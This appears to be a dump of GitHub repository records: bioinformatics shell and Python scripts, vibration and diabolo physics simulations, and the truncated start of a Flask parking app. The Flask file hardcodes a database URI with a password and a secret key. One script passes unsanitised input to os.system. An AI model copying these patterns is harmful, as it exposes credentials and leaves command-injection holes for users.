"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1225,
"license_type": "no_license",
"max_line_length": 225,
"num_lines": 51,
"path": "/heatmapr_h",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\nimport re\nimport os\n\nif len(sys.argv)<4:\n\tprint(\"Usage:heatmapr_h <bedfilelist> <wigfilelist> <advanced_parameter>\")\n\texit(0)\n\nparameter=''\nif len(sys.argv)>4:\n\tparameter=' '.join(sys.argv[4:])\n\nhmethod=sys.argv[3]\n\nbedfiles=[]\ntitles=[]\nwith open(sys.argv[1]) as bedfile:\n\tfor i in bedfile.readlines():\n\t\ti=i.strip()\n\t\tif re.findall('\\t',i):\n\t\t\tbedfiles.append(i.split('\\t')[0])\n\t\t\ttitles.append(i.split('\\t')[1])\n\t\telse:\n\t\t\tbedfiles.append(i)\n\t\t\ttitles.append(i)\nbedfile.close()\n\nwigfiles=[]\nsubtitles=[]\nwith open(sys.argv[2]) as wigfile:\n\tfor i in wigfile.readlines():\n\t\ti=i.strip()\n\t\tif re.findall('\\t',i):\n\t\t\twigfiles.append(i.split('\\t')[0])\n\t\t\tsubtitles.append(i.split('\\t')[1])\n\t\telse:\n\t\t\twigfiles.append(i)\n\t\t\tsubtitles.append(i)\nwigfile.close()\n\nwigfiles_str=','.join(wigfiles)\nsubtitles_str=','.join(subtitles)\n\nfor i in range(len(bedfiles)):\n\ttry:\n\t\tsystem_str='heatmapr --name='+titles[i]+' --method '+hmethod+' --subtitle='+subtitles_str+' --x_label='+subtitles_str+' --y_label='+subtitles_str+' --wig='+wigfiles_str+' -b '+bedfiles[i]+' --title='+titles[i]+' '+parameter\n\t\tos.system(system_str)\n\texcept:\n\t\tprint('Error during heatmapr.Skip this one.')\n"
},
{
"alpha_fraction": 0.647311806678772,
"alphanum_fraction": 0.6645161509513855,
"avg_line_length": 18.375,
"blob_id": "21275c13fa77f987e6623f40e6ea17f11a69c4ed",
"content_id": "4b20b28cb3ab0cf7c11165d7dab7a58c5ce8ffea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/subtract_0",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\nimport re\n\nif len(sys.argv)<3:\n\tprint(\"Usage:subtract_0 <wigfile_input> <wigfile_output>\")\n\texit(0)\n\noutfile=open(sys.argv[2],'w')\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\tline=line.strip()\n\t\tif re.findall('chrom',line):\n\t\t\toutfile.write(line+'\\n')\n\t\telse:\n\t\t\ts=float(line)\n\t\t\tif s<0:\n\t\t\t\toutfile.write('0\\n')\n\t\t\telse:\n\t\t\t\toutfile.write(line+'\\n')\n\noutfile.close()\ninfile.close()\n"
},
{
"alpha_fraction": 0.6619915962219238,
"alphanum_fraction": 0.6891070604324341,
"avg_line_length": 24.464284896850586,
"blob_id": "91028c79009342670ecb3d9b1cdafb39316fb5b8",
"content_id": "c35ee0da32ec70e8db48b11de384e612e918e9a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2143,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 84,
"path": "/rna-seq_pipeline",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 3 ];then\necho \"Need 3 parameters! <start_position> <end_positon> <Species>\"\nexit\nfi\n\nstart_p=$1\nend=$2\n\necho \"start_postion=${start_p}\"\necho \"end_posiotion=${end}\"\n\nif [ \"$3\" != \"mm9\" -a \"$3\" != \"hg19\" ];then\necho \"Species:mm9/hg19\"\nexit\nfi\n\nif [ \"$3\" = \"mm9\" ];then\nGTF=/nethome/Shared/annotation/iGenome/Mus_musculus/UCSC/mm9/Annotation/Genes/genes.gtf\nGENOME_FA=/nethome/Shared/annotation/iGenome/Mus_musculus/UCSC/mm9/Sequence/Bowtie2Index/genome.fa\nGENOME=/nethome/Shared/annotation/iGenome/Mus_musculus/UCSC/mm9/Sequence/Bowtie2Index/genome\nelse\nGENOME_FA=/nethome/Shared/annotation/genomes/hg19/Sequence/Bowtie2Index/genome.fa\nGENOME=/nethome/Shared/annotation/genomes/hg19/Sequence/Bowtie2Index/genome\nGTF=/nethome/Shared/annotation/genomes/hg19/Annotation/Genes/genes.gtf\nfi\n\nfor file in `ls *R1*.fastq`\ndo \n{\ntrim ${file} ${file%%_*}_1.fastq $start_p $end \ntrim ${file/R1/R2} ${file%%_*}_2.fastq $start_p $end \n} &\ndone\nwait\n\n\nfor file in `ls *_1.fastq`\ndo\noutdir=${file%_*}_tophat\ntophat -o ${outdir} --no-coverage-search --no-novel-juncs -p 16 -G ${GTF} ${GENOME} ${file} ${file%%_1.fastq}_2.fastq \n#mkdir ${outdir}\n#bowtie2 -p 16 -x $GENOME -1 $file -2 ${file/_1/_2} -S ${outdir}/${outdir}.sam 2>&1|tee ${outdir}/${outdir}.align.log\ndone\n\n#if [ -f \"assembly.txt\" ]; then \n# rm assembly.txt\n#fi \n\n#touch assembly.txt\n\n#for filedir in `ls -F | grep 'tophat/$'`\n#do\n#outdir=${filedir%/*}_cufflinks\n#echo ${outdir}\"/transcripts.gtf\" >> assembly.txt\n#cufflinks -p 16 -G $GTF -o ${outdir} ${filedir}accepted_hits.bam\n#done\n\n#cuffmerge -g $GTF -o cuffmerge_out -p 16 assembly.txt\n\n#GTF_merged=cuffmerge_out/merged.gtf\n\nfor filedir in `ls -F | grep 'tophat/$'`\ndo\noutdir=${filedir%%/}_cuffquant\ncuffquant -o ${outdir} -p 16 -u $GTF ${filedir}accepted_hits.bam\ndone\n\nfiles2=\"\"\nlabel=\"\"\nfor file in `ls -F | grep '_cuffquant/$'`\ndo\nlabel=${label}${file%%_*}\",\"\nfiles2=${files2}${file}\"abundances.cxb \"\ndone\n\nlabel=${label%,*}\n\ncuffnorm -p 12 --labels ${label} --library-norm-method=classic-fpkm -o cuffnorm_table $GTF ${files2}\n\nmkdir tophat cufflinks cuffquant\nmv *_tophat/ tophat\nmv *_cuffquant/ cuffquant\n"
},
{
"alpha_fraction": 0.588850200176239,
"alphanum_fraction": 0.7317073345184326,
"avg_line_length": 56.400001525878906,
"blob_id": "3808eb574c191e7de6547e029ca6d3fb0101d1ab",
"content_id": "93e2e440b83db05800596540ce5b0a52bf1e850f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 5,
"path": "/download.sh",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "for i in {279..306}\ndo\n#wget ftp://ftp-trace.ncbi.nlm.nih.gov/sra/sra-instant/reads/ByStudy/sra/SRP/SRP070/SRP070710/SRR3184${i}/SRR3184${i}.sra\nascp -k 1 -T -i ~/asperaweb_id_dsa.openssh [email protected]:/sra/sra-instant/reads/ByStudy/sra/SRP/SRP070/SRP070710/SRR3184${i}/SRR3184${i}.sra .\ndone\n"
},
{
"alpha_fraction": 0.6830601096153259,
"alphanum_fraction": 0.6958105564117432,
"avg_line_length": 17.86206817626953,
"blob_id": "3395e021f84614cc8350fdbc33010e14ff3bab95",
"content_id": "f6290a34c681432046ca179fbc715ff394fbba6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 29,
"path": "/random_peak",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\nimport random\n\nif len(sys.argv)<3:\n\tprint(\"Usage:random_peak peaklist random_number\")\n\texit(0)\n\npeak=[]\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\tline=line.strip()\n\t\tpeak.append(line)\ninfile.close()\n\nrecord=open('peakfile','w')\n\nnumber=int(sys.argv[2])\nfor i in range(number):\n\toutput=\"peaklist_\"+str(i)\n\tout=open(output,'w')\n\tslice = random.sample(peak, 50)\n\toutline='\\n'.join(slice)\n\tout.write(outline)\n\tout.close()\t\t\n\trecord.write(output+'\\n')\n\nrecord.close()\t\t\n"
},
{
"alpha_fraction": 0.6734177470207214,
"alphanum_fraction": 0.7088607549667358,
"avg_line_length": 25.33333396911621,
"blob_id": "c7d46ed557c192a5297eefe1d937a5f00ed718ef",
"content_id": "be1d6d5b3395e61fbd3e0714774c01377f865abf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 15,
"path": "/norm_macs14",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport pandas as pd\nimport sys\n\nif len(sys.argv)<3:\n\tprint('Usage:norm_macs14 <wigfile> <wigfile_out>')\n\texit(0)\n\nnames=[\"position\",\"reads\"]\ndf=pd.read_table(sys.argv[1],sep=\"\\t\",names=names,low_memory=False)\nsum=df['reads'].sum(skipna=True)\ndf['reads']=df['reads']*1000000/sum\ndf.to_csv(sys.argv[2],sep=\"\\t\",index=False,header=False)\ndf.describe()\n"
},
{
"alpha_fraction": 0.6415094137191772,
"alphanum_fraction": 0.6561844944953918,
"avg_line_length": 19.7391300201416,
"blob_id": "a6ba414a0ca1dc67525e43feb2f77d3d1cdc3054",
"content_id": "6d4596ec3ff1d978184fc49e8e41b6ff9902d97e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 23,
"path": "/get_gene_from_ceas",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport sys\n\nif len(sys.argv)<3:\n\tprint(\"Usage:get_gene_from_ceas <ceas.xls> <output_genename>\")\n\texit(0)\n\noutput=open(sys.argv[2],'w')\nwith open(sys.argv[1]) as infile:\n\tfor line in infile.readlines():\n\t\tif line.startswith('#') or line=='\\n':\n\t\t\tpass\n\t\telse:\n\t\t\tline_split=line.split('\\t')\n\t\t\tnumbers=[float(a) for a in line_split[9:]]\n\t\t\tif sum(numbers)==0:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\toutput.write(line)\n\noutput.close()\ninfile.close()\n"
}
] | 19 |
JosephAFuentes/Oscillation-Vibration-Practice | https://github.com/JosephAFuentes/Oscillation-Vibration-Practice | 37a3a4455be70f6a04c8f8a9456548d19bbebe4a | 86586fdf52593ab9bb04c15959ce9cbc7a1e24de | c955169ced55b6c60e332ab7153200ee4e335d39 | refs/heads/master | 2021-07-03T13:51:38.362751 | 2017-09-20T03:40:25 | 2017-09-20T03:40:25 | 104,161,936 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6221945285797119,
"alphanum_fraction": 0.647132158279419,
"avg_line_length": 30.57480239868164,
"blob_id": "3d8216eeeaa5b98e10cc74e230499be75b11bfd7",
"content_id": "d154a0d92cf0033b2f3629fa6bc795b7759c04bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4010,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 127,
"path": "/2nd_order_frequency_response_force_input.py",
"repo_name": "JosephAFuentes/Oscillation-Vibration-Practice",
"src_encoding": "UTF-8",
"text": "'''2nd Order step response\n my'' +cy' +ky = f\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\ndef eq_of_motion(w, t, p):\n \"\"\"\n Defines the differential equations for the direct-force mass-spring-damper system.\n\n Arguments:\n w : vector of the state variables:\n t : time\n p : vector of the parameters:\n \"\"\"\n x, x_dot = w\n m, k, c, StartTime, F_amp = p\n\n # Create sysODE = (x', x_dot')\n sysODE = [x_dot,\n -k/m * x - c/m * x_dot + f(t, p)/m]\n return sysODE\n\n\ndef f(t, p):\n \"\"\"\n defines the disturbance force input to the system\n \"\"\"\n m, k, c, StartTime, F_amp = p\n \n # Select one of the two inputs below\n # Be sure to comment out the one you're not using\n \n # Input Option 1: \n # Just a step in force beginning at t=DistStart\n # f = F_amp * (t >= DistStart)\n \n # Input Option 2:\n # A pulse in force beginning at t=StartTime and ending at t=(StartTime + 0.5)\n f = F_amp * (t >= StartTime) * (t <= StartTime + 0.5) + 5 * (t >= StartTime+0.25) * (t <= StartTime + 0.5)\n \n return f\n\n# Define the System Parameters\nm = 1.0 # kg\nk = (2.0 * np.pi)**2 # N/m (Selected to give an undamped natrual frequency of 1Hz)\nwn = np.sqrt(k / m) # Natural Frequency (rad/s)\n\nz = 0.1 # Define a desired damping ratio\nc = 2 * z * wn * m # calculate the damping coeff. to create it (N/(m/s))\n\n# Set up simulation parameters\n\n# ODE solver parameters\nabserr = 1.0e-9\nrelerr = 1.0e-9\nmax_step = 0.01\nstoptime = 10.0\nnumpoints = 10001\n\n# Create the time samples for the output of the ODE solver\nt = np.linspace(0.0, stoptime, numpoints)\n\n# Initial conditions\nx_init = 0.0 # initial position\nx_dot_init = 0.0 # initial velocity\n\n# Set up the parameters for the input function\nStartTime = 0.5 # Time the f(t) input will begin\nF_amp = 10.0 # Amplitude of Disturbance force (N)\n\n# Pack the parameters and initial conditions into arrays \np = [m, k, c, StartTime, F_amp]\nx0 = [x_init, x_dot_init]\n\n# Call the ODE solver.\nresp = odeint(eq_of_motion, x0, t, args=(p,), atol=abserr, rtol=relerr, hmax=max_step)\n\n# Make the figure pretty, then plot the results\n# \"pretty\" parameters selected based on pdf output, not screen output\n# Many of these setting could also be made default by the .matplotlibrc file\n\n# Set the plot size - 3x2 aspect ratio is best\nfig = plt.figure(figsize=(6, 4))\nax = plt.gca()\nplt.subplots_adjust(bottom=0.17, left=0.17, top=0.96, right=0.96)\n\n# Change the axis units to serif\nplt.setp(ax.get_ymajorticklabels(),family='serif',fontsize=18)\nplt.setp(ax.get_xmajorticklabels(),family='serif',fontsize=18)\n\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\n\n# Turn on the plot grid and set appropriate linestyle and color\nax.grid(True,linestyle=':',color='0.75')\nax.set_axisbelow(True)\n\n# Define the X and Y axis labels\nplt.xlabel('Time (s)', family='serif', fontsize=22, weight='bold', labelpad=5)\nplt.ylabel('Position', family='serif', fontsize=22, weight='bold', labelpad=10)\n\n# Plot the first element of resp for all time. 
It corresponds to the position.\nplt.plot(t, resp[:,0], linewidth=2, linestyle = '-', label=r'Response')\n\n# uncomment below and set limits if needed\n# xlim(0,5)\n# ylim(0,10)\n\n# # Create the legend, then fix the fontsize\n# leg = plt.legend(loc='upper right', fancybox=True)\n# ltext = leg.get_texts()\n# plt.setp(ltext,family='serif',fontsize=18)\n\n# Adjust the page layout filling the page using the new tight_layout command\nplt.tight_layout(pad = 0.5)\n\n# save the figure as a high-res pdf in the current folder\n# It's saved at the original 6x4 size\n# plt.savefig('MCHE485_DirectForcePulseWithDamping.pdf')\n\nfig.set_size_inches(9, 6) # Resize the figure for better display in the notebook\nplt.show()\n"
},
{
"alpha_fraction": 0.5395604372024536,
"alphanum_fraction": 0.5945054888725281,
"avg_line_length": 21.19512176513672,
"blob_id": "acda2c1432858e4cdb286fb1c3d3e5df863a800a",
"content_id": "a0acbb2f6680b8afd37df47f33247c0e89d3f330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 910,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 41,
"path": "/scipy_ODE.py",
"repo_name": "JosephAFuentes/Oscillation-Vibration-Practice",
"src_encoding": "UTF-8",
"text": "'''m y''-(3x+2)y'+(6x-8)y=0, y(0)=2, y'(0)=3\n'''\nimport numpy as np\nimport scipy as sp\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nm = 1\nk = (2.0*np.pi)**2\n\nwn = np.sqrt(k/m) # Natural Frequency (rad/s)\n\nz = 0.25 # Define a desired damping ratio\nc = 2*z*wn*m \n\ndef g(y, x):\n global m\n global c\n global k\n y0 = y[0]\n y1 = y[1]\n y2 = (c*(-y1)+k*(x))/(m)\n return y1, y2\n\n# Initial conditions on y, y' at x=0\ninit = 0, 0\n# First integrate from 0 to 2\nx = np.linspace(0,2,100)\nsol=odeint(g, init, x)\n# Then integrate from 0 to -2\nplt.plot(x, sol[:,0], color='b')\nx = np.linspace(0,-2,100)\nsol=odeint(g, init, x)\nplt.plot(x, sol[:,0], color='b')\n\n# The analytical answer in red dots\nexact_x = np.linspace(-2,2,10)\nexact_y = 2*np.exp(2*exact_x)-exact_x*np.exp(-exact_x)\nplt.plot(exact_x,exact_y, 'o', color='r', label='exact')\nplt.legend()\n\nplt.show()\n"
},
{
"alpha_fraction": 0.5847750902175903,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 16,
"blob_id": "cc454d415916b8c4e3f2503432c6f75013ce3555",
"content_id": "3d62cfd18440844312ea67d886e4bb52d3020820",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 17,
"path": "/1st_order_step_response.py",
"repo_name": "JosephAFuentes/Oscillation-Vibration-Practice",
"src_encoding": "UTF-8",
"text": "'''TFirst order step Response and plotting\n DE: y'+5y = 1'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nt = np.linspace(0,10)\n\ny = 0.2-0.2*np.e**(-5*t)\nplt.plot(t,y)\n# Set y limits\nplt.ylim(0, 0.3)\n\n# Set y ticks\nplt.yticks(np.linspace(0, 0.3, 10, endpoint=True))\nplt.show()\n"
}
] | 3 |
jamesshapiro/python-experiments | https://github.com/jamesshapiro/python-experiments | 999b5b731f1e2bb546b6a20ef3075e5ca33324ac | d54c8f40585c7ca7c636711a9c2b379fe7f2b3cb | dd3df7eb01d7534f65a4d0b1009424a523199fe7 | refs/heads/master | 2021-01-19T02:26:16.350649 | 2017-04-06T04:06:41 | 2017-04-06T04:06:41 | 87,277,488 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4658169150352478,
"alphanum_fraction": 0.5249130725860596,
"avg_line_length": 19.5238094329834,
"blob_id": "0d573ab2de2ca2e4e3d0ec821e4a4f0cdc03efaa",
"content_id": "f7250b34e395f4d3ab05acd1aebdc42a35ef503a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 863,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 42,
"path": "/comprehensions1.py",
"repo_name": "jamesshapiro/python-experiments",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\"\"\"\nFile: hello.py\n\n[0, 1, 2, 3] -> [1, 3, 5, 7]\n\n[3, 5, 9, 8] -> [True, False, True, False]\n\nrange(10) -> [2, 3, 5, 7]\n\n['apple', 'orange', 'pear'] -> ['A', 'O', 'P']\n\n['apple', 'orange', 'pear'] -> ['apple', 'pear']\n\n['apple', 'orange', 'pear'] ->\n\n[('apple', 5), ('orange', 6), ('pear', 4)]\n\"\"\"\nimport math\ndef is_prime(n):\n if n == 2:\n return True\n for i in range(2,int(math.ceil(math.sqrt(n))+1)):\n if n % i == 0:\n return False\n return True\n\ncomp1 = [(x*2)+1 for x in range(4)]\ncomp2 = [x % 3 == 0 for x in [3, 5, 9, 8]]\ncomp3 = [x for x in range(2,10) if is_prime(x)]\n\nbasket = ['apple', 'orange', 'pear']\ncomp4 = [x[0].upper() for x in basket]\ncomp5 = [x for x in basket if len(x) < 6]\ncomp6 = [(x, len(x)) for x in basket]\n\nprint(comp1)\nprint(comp2)\nprint(comp3)\nprint(comp4)\nprint(comp5)\nprint(comp6)\n\n"
},
{
"alpha_fraction": 0.6772152185440063,
"alphanum_fraction": 0.6851266026496887,
"avg_line_length": 21.535715103149414,
"blob_id": "f5c814daec3fda5ca600c158945da0219fcefaed",
"content_id": "81d9ba378c7d8a8fbcda07151ed68655c4536219",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 632,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 28,
"path": "/dict-key.py",
"repo_name": "jamesshapiro/python-experiments",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n\"\"\"\nFile: dict-key.py\n\nExperiment to remind myself that Python uses \"==\" rather than \"is\"\nwhen comparing keys in a dictionary.\n\nOutput:\nfirst_cat == second_cat? True!\nfirst_cat is second_cat? False!\nAmerican Shorthair\nzero point zero\n\"\"\"\n\ndict = {}\nfirst_cat = \"cat\"\nsecond_cat = \"ca\"\nsecond_cat = second_cat + \"t\"\nprint(\"first_cat == second_cat: {}\".format(first_cat == second_cat))\nprint(\"first_cat is second_cat: {}\".format(first_cat is second_cat))\ndict[first_cat] = \"Siamese\"\ndict[second_cat] = \"American Shorthair\"\nprint(dict[first_cat])\n\ndict[0] = 'zero'\ndict[0.0] = 'zero point zero'\nprint(dict[0])\n\n"
}
] | 2 |
felixvd/Diabolo | https://github.com/felixvd/Diabolo | 144a17bc1b203965a7baf168ab1bebc296945ce2 | 561ca08c9f4b7f239ea4bb2cf853d614a5851916 | a590f4b31522230a5343cd850aa1601b575df630 | refs/heads/master | 2023-06-24T14:24:41.081194 | 2021-07-15T22:24:59 | 2021-07-15T22:24:59 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5071102976799011,
"alphanum_fraction": 0.5484303832054138,
"avg_line_length": 37.41237258911133,
"blob_id": "63e781d4ff769ca906416a7cf638503f50d27508",
"content_id": "06b3073d30652de357dbc6fa259bf086ff805884",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3727,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 97,
"path": "/env.py",
"repo_name": "felixvd/Diabolo",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\"\"\"\nThis file contains a environment for the 2D diabolo simulator:\nThe equations of motions of the diabolo can be viewed on \nhttps://www.overleaf.com/project/60c7b833bac7280c1b660be8\n\"\"\"\n\n\ndef update_position(pos_t_d, dot_pos_t_d, pos_t_s, dot_pos_t_s, l, wt, deltat=0.00001, g=9.8):\n \"\"\"\n Update the position of the diaoblo and the stick tips\n\n Args:\n pos_t_d: the position of the diabolo at time t\n a tuple with two elements, (diabolo_pos_xt, diabolo_pos_yt)\n dot_pos_t_d: the velocity of the diabolo at time t, \n a tuple with two elements, (dot_diabolo_pos_xt, dot_diabolo_pos_yt)\n pos_t_s: the positions of the stick tip at time t\n a tuple with four elements, (left_stick_pos_xt, left_stick_pos_yt, right_stick_pos_xt, right_stick_pos_yt)\n dot_pos_t_s: the velocity of the stick tip at time t\n a tuple with four elements, (dot_left_stick_pos_xt, dot_left_stick_pos_yt, dot_right_stick_pos_xt, dot_right_stick_pos_yt)\n l: the length of the string, a scalar\n wt: the rotational speed of the diabolo, a scalar\n deltat: the time interval for the velocity verlet algorithm\n g: the gravitional constant\n\n Return:\n pos_t_d\n dot_pos_t_d\n pos_t_s\n dot_pos_t_s\n wt\n \"\"\"\n xt_d, yt_d = pos_t_d\n dot_xt_d, dot_yt_d = dot_pos_t_d\n xt_l_s, yt_l_s, xt_r_s, yt_r_s = pos_t_s \n\n # Step1: Unconstrained position, with velocity-verlet euler integration\n xtplus1_d = xt_d + dot_xt_d * deltat\n ytplus1_d = yt_d + dot_yt_d * deltat - 0.5 * g * deltat**2\n\n # Step2: Constrain Position due to string\n ## Compute the center of the two sticks at time t\n x_center = (xt_l_s + xt_r_s) / 2.\n y_center = (yt_l_s + yt_r_s) / 2.\n ## Compute the parameters of the line\n m = (ytplus1_d-y_center)/(xtplus1_d-x_center)\n n = -1\n p = y_center - m * x_center\n ## Compute the parameters of the ellipse define by the two stick tips\n a = l/2.\n b = np.sqrt(a**2-(np.abs(xt_l_s-xt_r_s)/2)**2)\n ## Project the new position to the tangent plane of the ellipse\n if a**2*m**2+b**2*n**2 != 0 and n!=0 and a*b != 0:\n x_tmp1 = np.sqrt(a**2*b**2*n**2*(a**2*m**2+b**2*n**2-p**2))+a**2*m*p\n x_tmp1 = x_tmp1 / (a**2*m**2+b**2*n**2)\n y_tmp1 = m*np.sqrt(a**2*b**2*n**2*(a**2*m**2+b**2*n**2-p**2))-b**2*n**2*p\n y_tmp1 = y_tmp1 / (a**2*m**2*n+b**2*n**3)\n\n x_tmp2 = np.sqrt(a**2*b**2*n**2*(a**2*m**2+b**2*n**2-p**2))-a**2*m*p\n x_tmp2 = x_tmp2 / (a**2*m**2+b**2*n**2)\n y_tmp2 = -(m*np.sqrt(a**2*b**2*n**2*(a**2*m**2+b**2*n**2-p**2))+b**2*n**2*p)\n y_tmp2 = y_tmp2 / (a**2*m**2*n+b**2*n**3)\n\n if x_tmp1*xtplus1_d > 0 and y_tmp1*ytplus1_d > 0:\n x_c, y_c = x_tmp1, y_tmp1\n else:\n x_c, y_c = x_tmp2, y_tmp2\n\n if n == 0 and m != 0 and a != 0 and b!=0:\n x_c = p / m\n y_tmp1 = b*np.sqrt(a**2-p**2/m**2)/a\n y_tmp2 = -b*np.sqrt(a**2-p**2/m**2)/a\n \n if y_tmp1*ytplus1_d > 0:\n y_c = y_tmp1\n else:\n y_c = y_tmp2\n\n # Step3: Add pull velocity if the sticks are moving\n if np.linalg.norm(dot_pos_t_s) > 1e-2:\n v_pull = (x_c - xtplus1_d, y_c - ytplus1_d)\n dot_pos_t_d = (dot_pos_t_d[0]+v_pull[0], dot_pos_t_d[1]+v_pull[1])\n\n # Step4: Constrain velocity\n u = -b**2*c_c / (a**2*y_c)\n v = np.array(dot_pos_t_d)\n n = np.array([0, y_c-u*x_c])\n if np.cross(v, n) < 0:\n cos_vn = np.inner(v,n)/(np.linalg.norm(v)*np.linalg.norm(n))\n v_c = v * cos_vn\n dot_pos_t_d = v_c\n \n # Update rotational velocity \n\n return pos_t_d, dot_pos_t_d, pos_t_s, dot_pos_t_s, wt \n"
}
] | 1 |
NguyenHuy1812/ParkingHero-Back | https://github.com/NguyenHuy1812/ParkingHero-Back | 4e9f16510d2ce1bc5dfca5fa8df65b48afd9812b | e7294863d1ddb0d6974a86de2fb75cf55312019c | 7272db3990eecd5a3996e580b3fba72dab3ce8b1 | refs/heads/master | 2022-03-26T03:58:07.903349 | 2019-07-31T04:55:48 | 2019-07-31T04:55:48 | 199,775,295 | 0 | 0 | MIT | 2019-07-31T04:00:15 | 2019-07-31T04:56:00 | 2022-04-06T18:51:14 | Python | [
{
"alpha_fraction": 0.6216534376144409,
"alphanum_fraction": 0.6264973282814026,
"avg_line_length": 39.412696838378906,
"blob_id": "47f077b48be4b0dd87c7a0b45128abeb416b94fd",
"content_id": "9ab6348f96f46dc1e99a51be47dbcce320a38a4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15277,
"license_type": "permissive",
"max_line_length": 260,
"num_lines": 378,
"path": "/app/__init__.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "import os\nfrom flask import Flask, redirect, url_for, flash, render_template, jsonify,request\nfrom flask_login import login_required, logout_user,current_user, login_user\nfrom .config import Config\nfrom .oauth import blueprint\nfrom .cli import create_db\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom .models import db, User, OAuth, Token\nimport requests\nfrom .models import db,User, login_manager,User,UserMixin ,ProfileUser, Building ,ma , UserSchema, Price, Transaction, Parking,BuildingSchema ,TransactionSchema\nfrom .forms import SignupForm, SigninForm, EditProfileForm\nfrom flask_dance.consumer.storage.sqla import SQLAlchemyStorage\nfrom flask_cors import CORS , cross_origin\nfrom flask_dance.contrib.facebook import make_facebook_blueprint\nfrom flask_migrate import Migrate\nimport wtforms_json\nimport uuid\nfrom sqlalchemy import func\nimport datetime\nfrom datetime import datetime, timedelta\nfrom flask_apscheduler import APScheduler\nfrom flask_qrcode import QRcode\nimport random\nwtforms_json.init()\n\napp = Flask(__name__)\n\n\n\ncors = CORS(app)\nmigrate = Migrate(app, db, compare_type = True)\napp.config.from_object(Config)\napp.register_blueprint(blueprint, url_prefix=\"/login\")\napp.cli.add_command(create_db)\ndb.app = app\ndb.init_app(app)\nqrcode =QRcode(app)\nlogin_manager.init_app(app)\n\nPOSTGRES = {\n 'user': 'mac',\n 'pw': None,\n 'db': 'updated',\n 'host': 'localhost',\n 'port': 5432,\n}\n\n\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://%(user)s:%(pw)s@%(host)s:\\\n# %(port)s/%(db)s' % POSTGRES\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://blahqbnzhzahuo:cfaca93d75d48febc299ffc00deff270c5a0e77c786af880e478da51d58ca485@ec2-174-129-220-12.compute-1.amazonaws.com:5432/dcp256gma5sjca' \napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config[\"SECRET_KEY\"] = '_5#y2L\"F4Q8z\\n\\xec]/'\n\nscheduler = APScheduler()\n\nscheduler.init_app(app)\n\nscheduler.start()\n\n\n\[email protected](\"/logout\", methods = ['POST', 'GET'])\n@login_required\ndef logout():\n if request.method ==\"POST\":\n cur_token = Token.query.filter_by(user_id = current_user.id).first()\n print(cur_token)\n 